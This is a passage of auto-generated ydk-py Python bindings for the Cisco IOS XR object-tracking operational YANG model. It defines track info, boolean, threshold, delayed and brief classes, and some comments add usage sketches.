('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeInterface.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
    Weight is the number assigned to a track object. In the case of type threshold weight (i.e. a weighted sum list), the weight is assigned by the user at the time of configuration. In the case of type threshold percentage (i.e. a percentage based list), the weight is internally computed as (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks']['meta_info']
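# Worked example (sketch): per the weight description above, a percentage-based
# threshold list with N member objects reports each weight as (1/N)x100. For
# N = 4 every member weighs 25, so two members being up contribute 50 of the
# 0..100 aggregate that the user-specified threshold_up/threshold_down limits
# plausibly gate.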
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces']['meta_info']
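# Usage sketch (illustrative): listing the interfaces registered against this
# track entry, given a populated TrackInfo `info` (e.g., from a CRUD read):
#
#     for itf in info.tracking_interaces.interface_tracking_info:
#         print(itf.interface_name)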
class Delayed(_Entity_):
"""
Indicates whether the state change delay counter is in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.Delayed']['meta_info']
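# Usage sketch (illustrative): checking for a pending delayed transition on a
# populated TrackInfo `info`:
#
#     if info.delayed.time_remaining:
#         target = 'up' if info.delayed.track_state else 'down'
#         print('state change to', target, 'in', info.delayed.time_remaining, 's')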
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface']['meta_info']
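# End-to-end usage sketch (illustrative; the device address and credentials are
# placeholders, and the calls shown are ydk-py's standard CRUD read pattern for
# operational data):
#
#     from ydk.services import CRUDService
#     from ydk.providers import NetconfServiceProvider
#     from ydk.models.cisco_ios_xr import \
#         Cisco_IOS_XR_manageability_object_tracking_oper as ot_oper
#
#     provider = NetconfServiceProvider(address='192.0.2.1', port=830,
#                                       username='admin', password='admin')
#     tracking = CRUDService().read(provider, ot_oper.ObjectTracking())
#     for info in tracking.track_type_interface.track_info:
#         print(info.tracke_name, 'up' if info.track_state else 'down')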
class TrackBriefs(_Entity_):
"""
Object Tracking Track table brief
.. attribute:: track_brief
Track name \- maximum 32 characters
**type**\: list of :py:class:`TrackBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs, self).__init__()
self.yang_name = "track-briefs"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-brief", ("track_brief", ObjectTracking.TrackBriefs.TrackBrief))])
self._leafs = OrderedDict()
self.track_brief = YList(self)
self._segment_path = lambda: "track-briefs"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs, [], name, value)
class TrackBrief(_Entity_):
"""
Track name \- maximum 32 characters
.. attribute:: track_name (key)
Track name
**type**\: str
**length:** 1..32
**config**\: False
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief, self).__init__()
self.yang_name = "track-brief"
self.yang_parent_name = "track-briefs"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['track_name']
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief))])
self._leafs = OrderedDict([
('track_name', (YLeaf(YType.str, 'track-name'), ['str'])),
])
self.track_name = None
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-brief" + "[track-name='" + str(self.track_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-briefs/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief, ['track_name'], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-brief"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
